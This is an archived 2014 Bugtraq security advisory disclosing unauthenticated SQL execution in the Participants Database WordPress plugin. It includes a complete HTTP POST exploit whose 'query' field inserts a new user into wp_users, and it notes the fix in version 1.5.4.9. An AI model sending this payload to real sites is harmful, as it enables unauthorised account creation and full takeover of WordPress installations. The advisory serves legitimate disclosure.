lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 1 Jun 2014 13:28:20 +0700
From: Yarubo Internet Security Scan <no-reply@...ubo.com>
To: bugtraq@...urityfocus.com
Subject: Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
=========================================================

Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1

— Info —

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

— Vulnerability details —

1. If any of the shortcodes is used (e.g. signup page) then it is
possible for anonymous (unauthenticated) users to trigger some
administrative actions.

2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated
user can execute arbitrary SQL statements (e.g. create an admin user,
read or write files, or execute code depending on the MySQL user
privileges).


— Exploit —

Add a user to wordpress as follows (if you want an admin user, add
admin privileges to wp_usermeta):


POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN

------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"

output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"

participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"

participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"

INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);

------WebKitFormBoundaryuoACADe1C2IFWMxN



— Solution —

This issue has been fixed in version 1.5.4.9. Download the newest version from:

https://wordpress.org/plugins/participants-database/


— Credit —


Yarubo Research Team
research [at] yarubo.com

Network Security Scan:
http://www.yarubo.com/

Free Heartbleed Scan:
http://www.yarubo.com/heartbleed

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ